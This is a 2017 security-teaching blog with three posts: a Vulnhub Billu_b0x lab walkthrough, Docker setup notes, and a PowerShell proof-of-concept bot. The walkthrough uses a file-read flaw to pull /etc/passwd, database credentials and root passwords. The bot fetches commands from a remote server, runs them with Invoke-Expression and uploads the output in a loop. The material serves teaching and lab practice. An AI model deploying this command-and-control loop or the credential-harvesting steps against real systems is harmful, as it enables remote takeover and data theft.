Sunday, October 29, 2017

Vulnhub: Billu_b0x Walkthrough

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub images to refresh my knowledge on the tools that can be used.  Also to provide step-by-step walk-through exercises that students can follow.

The first vulnhub image I found was called Billu-b0x.  Below is the link to the image on vulnhub that can be downloaded.  This image has a variety of walkthrough exercises already, the one I have chosen to highlight and also follow closely is listed below.


Vulnhub Link: https://www.vulnhub.com/entry/billu-b0x,188/

Highlighted Walkthrough: 
https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/

Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer

Billu-b0x VM
Kali Linux Distro VM (Downloaded the VM edition from kali.org)
1 - nikto - Nikto Web Vulnerability Scanner
2 - dirb - Directory Buster
3 - burp - Burp Suite Free Edition v1.7
4 - Firefox Web Browser

1.  Setup the Kali VM and the Billu-b0x VM with host-only network settings.  Conduct both actions prior to powering on the VM.  Both VM's require at least 5 GB of host memory to run in parallel.  I would recommend that you run the VM's on an SSD drive. 

2.  Find the IP Address that was given to the Billu_b0x VM.  The IP Address provided in my environment is 172.16.216.129.  Then run a nmap scan on the IP Address to identify the open ports.

Command: nmap -sV 172.16.216.129



3. The port scan came up with 2 ports being open.  Ports 22/tcp SSH and 80/tcp HTTP.  A step that I would take is to google the versions of the tools displayed to identify any vulnerabilities that would be applicable.  To keep this brief I am not going to include my results.

4.  My host is running a version of Linux, this step is not necessary to the completion of the lab, but I am going to demonstrate how I am using SSH to utilize X11 forwarding so that Burp Suite and Firefox running on the Kali VM appears on the host screen.  (There are tools to do this when the host is Windows, google it.)

Command: ssh -X root@172.16.216.130  (The -X option allows the X11 forwarding.  Run the command 'man ssh' for additional information about this and other parameters that can be used)




5.  If you ran the command for step 4 correctly, you should see a prompt indicating that you logged in correctly.  The default root password for Kali is toor.  Note: You will need to modify the SSH configuration on the Kali VM prior to step 4 working.  To do this modify the file on the Kali box to appear as the following screenshot.

Command: vim /etc/ssh/sshd_config  OR nano /etc/ssh/sshd_config  (Google the commands to find a cheat sheet for them.)


Scroll down to verify the X11Forwarding is set to yes... On a production system you would probably set this to "No".


6.   Now through the SSH session that is established I am going to launch firefox on the Kali box and it is going to appear on my host.  Notice the heading of the window that pops up it shows '(on kali)'

Command: firefox




7.  Using firefox I am now going to browse to the site and see what it presents.

URL: http://172.16.216.129



8.  By reading the page you can quickly see that it provides a hint that there may be a sql injection vulnerability.  However, prior to jumping to finding a sql injection vulnerability, look around more.  Right-Click on the page and View the Source Code.  Sometimes you can find additional information, pages, or hints to what you need to do next.  Check to see if a robots.txt file exists, http://172.16.216.129/robots.txt.  Google what the purpose of the robots.txt file is if you do not know.

9.  I like a tool called nikto.  It is a web vulnerability scanner that I typically execute when I first come across a page.

Command: nikto -h 172.16.216.129



10. Again, do not jump to fast into testing the vulnerabilities, continue to gather information about the virtual machine.  Record the results of what you found with the nikto command.  We will come back to it.

11. Now we are going to use dirb or directory buster.  This will brute-force the URL and try and find additional pages or directories that we currently do not know about.  We are going to SSH into the Kali VM, you can utilize the -X command line switch as demonstrated above.  You will have multiple SSH sessions open by the end of this.

Command: dirb http://172.16.216.129
Command: dirb http://172.16.216.129 /usr/share/wordlists/dirb/big.txt



12. In the above output from dirb you can see a couple more directories were found.  As you read the individual lines the code is the HTTP code that is returned, 200 for a successful page load, a 302 for access is denied, etc.  Google the HTML Codes if you have more questions.

13. With the information gathered start to visit the pages and gather more information of what the pages can do, what language the pages are written in, etc.  Try not to focus again on any particular page, just look through them.

14. Also knowing that it found PHPMyAdmin located under the directory of http://172.16.216.129/phpmy/ I reran nikto with this information to find some additional vulnerabilities.  Note: PHPMyAdmin normally has vulnerabilities and exploits published about it.

Command: nikto -h http://172.16.216.129/phpmy/



15. Notice as you browse these files that are found, you find a README file that shows the version of PHPMyAdmin being 3.4.7.  A quick google search identifies an exploit that is published that allows an authenticated attacker to inject an XML file and read arbitrary files like /etc/passwd.

16. After going through the files I am going to go back to the file http://172.16.216.129/test.php.  I am intrigued by the message presented on the page.  Maybe the file parameter can be used to read files on the web server.


17. To work more with the 'file' parameter we are going to use the Burp Proxy that is on the Kali server and X11 forward the GUI portion of the tool like we did for firefox above.  After it loads leave it as a temporary project and then click next, load defaults and then click start burp.

Command: burpsuite


18.  After burp loads, we need to turn the interception off.  Click on the "Proxy" tab and then click on "Intercept is on" and it should say off after clicked.


19.  This setting is not necessary but I am demonstrating how it is done in the event you need to use it.  Under the proxy tab click on options.  Notice that the proxy is only listening on localhost port 8080.  If you have multiple people utilizing the proxy or a local browser using the remote kali proxy you need to edit the setting and change it to all interfaces.  After you click ok, it will restart the listening port to be on all interfaces utilizing port 8080.


20.  Now to allow your web browser to proxy the page your are visiting you need to configure the browser to use the burp proxy.  Below is a screen shot of how to get to the settings and then how I have configured them.  I am utilizing Firefox.



21.  Now when the page http://172.16.216.129/test.php is hit through the browser, it should show up in burp under the tab target.  Now right-click on the test.php and then in the menu click on "Send to Repeater".  The tab should change colors.


22.  When you click on the repeater tab you should see the below image.  Remember that a web request is only text that is interpreted by the web server, in the case of PHP it is server-side.

23. Change the request being sent to the web server to be a POST and then add a parameter of "file=/etc/passwd" as shown below.



24. Notice that the response that is returned has the same message, file parameter is empty.  You need to work with the request headers and add the Content-Type header listed below.  Work with it until the response comes back with the contents of what appears to be the /etc/passwd file.


25.  Now that we can display the contents of a file on the file system, let's look at the PHP code in the files that we know about.  Notice in the c.php file that we found using dirb contains a username and a password that connects to a mysql database.


26. Now that we have a username and password we can use this to login to PHPMyAdmin.  PHPMyAdmin is used to manage the database using the particular users rights.  After logging in you can see the tables you have access to and more...



27.  In PHPMyAdmin click on Databases, then underneath database select ica_lab.



28.  Then click on the auth table.


29.  Now you can see under options the values of the database with it showing a plain-text password for biLLu.  This use can be used to now login to the page at index.php.

30. After successfully logging in you can see the below screenshot.



31.  To keep this brief, I am going to jump back to the vulnerability that you can utilize to view the source code of a file.  We are going to look at the configuration file for PHPMyAdmin.  This file is located normally at the root of the PMPMyAdmin installation.  For this site the file is located at http://172.16.216.129/phpmy/config.inc.php


32. As you look at the file that is returned you notice that the PHPMyAdmin software is configured with the root username and password.  Because of password reuse on systems you can use this username and password combination to login as the root user through SSH.

This walkthrough I am going to conclude, however there will be more to come.  Take time to explore other ways to exploit this VM. 

Enjoy.

Sunday, October 15, 2017

Docker - Quick Notes and How To

For an ethical hacking class that I will be teaching coming up in the near future I wanted to identify a way where I could provide students with a Kali Linux VM with docker images that they could use to learn from.  In the past, I would require the students to run at least 2 virtual machines to accomplish the tasks.  Resource constraints were sometimes an issue.

I believe with Docker running on a Kali Linux VM will work for what I need.  Here is a link to a site that you could use to walk through setting up Docker on Kali 2.x.

Link to site.

Here are some commands to get docker up and running:

#> service docker start
This will start the docker daemon that is running in the background of the Kali VM

#> docker search ubuntu
This command will search Docker Hub, internet access from the Kali VM is required, for any containers for the word ubuntu.  As you can see in the screenshot below, the name of the container, a brief description, the public rating of the container based on the number of starts, and if it is an official release from a trusted vendor.



#> docker pull <name of the container>
In the below screenshot, I am pulling down a container called raesene/bwapp.  This was after I searched for bwa or "Broken Web Apps" a project created by OWASP.  Notice that this package is not an official release and is contributed by a member of the community, this could be an unsafe docker container and contain malware.  Below you can see it as docker is pulling, downloading and extracting the container from docker hub.




#> docker images
In the below screenshot, it shows from the command the images that I have currently.  The creation date is when the container was created on Docker Hub or when you created it, for example host1 was created by me 14 hours ago.  Warning: It is very easy to download containers and run out of disk space on the VM that you are using.




#> docker run -it ubuntu bash
In the below screenshot, the command was issued to run the ubuntu container in interactive mode.  The last item in the command is bash, this tells docker to run the command bash in the container.  You are dropped into a bash shell where you can list the files in the container, etc.  Notice that the ifconfig command is not found.  As in a new install of ubuntu you can install net-tools to then be able to run ifconfig to return interface information. 


To install net-tools to the container that is running, first for ubuntu execute apt-get update, to update the repositories.


Then to install net-tools you can run apt-get install net-tools.


As observed above after installing net-tools the ifconfig command will return the interface information of the docker container.  Warning: If you type the command 'exit' you will return back to the state of the container prior to you installing net-tools.  Nothing is saved at this point-in-time.

Container #> Ctrl <p> Ctrl <q>
If you would like to save the state of the container you are working in, run the above command and it will drop you out to the docker host or the Kali VM while leaving the docker container running.

#> docker ps
The below screenshot demonstrates the execution of Ctrl <p> Ctrl <q> to jump out of a docker container, then the execution of 'docker ps' shows the container still running, the image used, the command being executed, when it was created, the uptime or status, if any network ports are mapped, and a nickname of the container assigned by docker.


#> docker attach <container ID>
#> docker attack <Names or Nickname>
You can reattach to the docker container by issuing the container ID as shown in the above screenshot or by the nickname provided by docker.

#> docker commit <container ID> <New Image Name>
After interacting with the ubuntu container, installing net tools, jumping out of the container while it is running, and now wanting to save the state the image is in I can commit the changes to a new image name.  As you can see in the image below I committed the running instance of the ubuntu image by calling it by the nickname, then saving it as ubuntu-w-nettools.  Then when you run docker images, you can see the new image available that can be run as a container.


#> docker network create --driver=bridge network1 --subnet=172.31.0.0/24
By default from what I have read docker creates a default bridged network of 172.17.0.0/16.  Wow, huge...  You can create additional networks that bridge the host VM's NIC.  The above command creates a network, that is bridged, with a nickname of network1, and assigns it the subnet 172.31.0.0/24.  Warning: Bridging across the interface may allow the container to access the internet.

#> docker network ls
#> docker network inspect network1

In the below screenshot it shows the network1 that I created above, by running 'docker network ls'.  To inspect or to get additional details about the networks I can inspect them individually.  The example below shows me the details of the network1 that I created, mainly the subnet and the driver used.  My thought here was I can control whether a container is in the DMZ or other subnet for organization.



 #> docker run -tid --network=network1 --ip=172.31.0.7 ubuntu-w-nettools bash
The above command, creates an interactive container, with the -d it places it in the background, assigns the container to the network1 or the 172.31.0.0/24 subnet, assigns the container to have the IP Address of 172.31.0.7, uses the container that we created with net-tools installed and runs the command bash.  As you can see in the below screenshot, the IP Address returned by ifconfig is the one assigned.


#> docker run -d --network=network1 --ip=172.31.0.8 raesene/bwapp
Notice in the above docker container for OWASP Broken Web Apps you do not need to run the command switches of -it to make it interactive.  As you can see in the below image I have 3 containers running, the raesene/bwapp has 2 ports mapped so I can interact with port 80 and 3306 by the IP Address assigned.



#> docker rmi image
This command allows you to remove an image from the list presented by 'docker images'

#> docker stop <nickname of container>
#> docker stop <container ID>
#> docker kill <nickname of container>
#> docker kill <container ID>

As showing below I am using the above command to stop or kill the container that is running.  Obviously a difference between stopping and killing of the running container.



Hopefully, this has been helpful.  Considering I sat down yesterday with the intention to learn about docker and within 3 hours I had a very basic understanding of how it could benefit the class that I will be teaching and in other ways in my career.  Warning again that the docker service runs as root and you should trust the containers that you download and execute, be careful, you may trust the creator but may not trust who was on the creators computer at the time.

 Enjoy.

Thursday, October 12, 2017

Powershell - Using Add-Member to Add Scripts to the objects of a File

While at Saintcon 2017, I was in a training called "Attack and Defend with Powershell" taught by Aelon Porat.  During the training he created a file with notepad and then was displaying the attributes, properties, etc. of the file.  Then I thought about a Proof-of-Concept for a bot to utilize scripts that can be added as a Script Method to a file.

The below bot calls out to an IP address to download a command that is inside of a file on a web server, stores the command as a Note Property Value with the file system object, executes the command, stores the results as a Note Property Value, and then uploads the results.  This could have been combined with less scripts, but did this to display the capability.

To run these powershell commands you need a file called note.txt in the directory where you run the powershell script below.




$ErrorActionPreference="SilentlyContinue"

# Create a file called note.txt
$file = Get-ChildItem note.txt

# Place a string value in a note property 
$file | Add-Member -NotePropertyName Status -NotePropertyValue "123456abcABC+==" -Force # Use force to overwrite the note property
$file | Add-Member -NotePropertyName Collected -NotePropertyValue "123456abcABC+==" -Force

# Have a script property attached to a file to download the bots commands and save it in status
$file | Add-Member -MemberType ScriptMethod -Name "Download" -Value {
    $webClient = New-Object System.Net.WebClient
    $noteInfo = $webClient.DownloadString("http://172.16.214.1/string.txt")
    $file | Add-Member -NotePropertyName Status -NotePropertyValue $noteInfo -Force
} -Force

# Then have a script property attached to a file to execute the comand that is placed in Status
$file | Add-Member -MemberType ScriptMethod -Name "Execute" -Value {
    $collected = Invoke-Expression -Command $file.Status 2>&1
    $file | Add-Member -NotePropertyName Collected -NotePropertyValue $collected -Force
} -Force

# Then have a script property which will upload the results
$file | Add-Member -MemberType ScriptMethod -Name "Upload" -Value {
    $postParams = @{info=$file.Collected}
    Invoke-WebRequest -Uri http://172.16.214.1/info -Method POST -Body $postParams
} -Force

while ($True) {
    $file.Download()
    Sleep -Seconds 5
    $file.Execute()
    sleep -Seconds 5
    $file.Upload()
    sleep -Seconds 5
} 
Another interesting discovery, was the Get-FileHash of the file "note.txt" does not change when a the NotePropertyValue changes, because it is applied to the variable and not the file:


Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...